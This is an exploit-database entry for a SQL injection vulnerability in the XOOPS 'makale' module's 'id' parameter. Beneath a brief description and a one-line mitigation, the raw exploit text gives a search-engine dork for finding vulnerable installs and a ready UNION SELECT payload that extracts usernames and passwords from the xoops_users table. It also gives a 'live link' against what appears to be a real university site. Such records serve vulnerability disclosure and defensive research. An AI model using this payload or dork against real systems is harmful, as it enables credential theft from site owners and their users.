header-logo
Suggest Exploit
vendor:
makale
by:
EcHoLL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: makale
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XOOPS Module: makale

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to 'makale.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication, gain access to sensitive data, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########################################
#
# XOOPS Module:  makale
#
#
##########################################
#
##AUTHOR : EcHoLL
####HOME : http://www.warezturk.org
#
####MAİL : echoll1983@hotmail.com
#
###########################################
#
# DORKS 1 : dork: /modules/makale/
###########################################
 
target: scriptpage.com/modules/makale/makale.php?id= [sql Code]
 
Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--
 
live link: http://stu.inonu.edu.tr/~usit/modules/makale/makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--

# milw0rm.com [2008-10-20]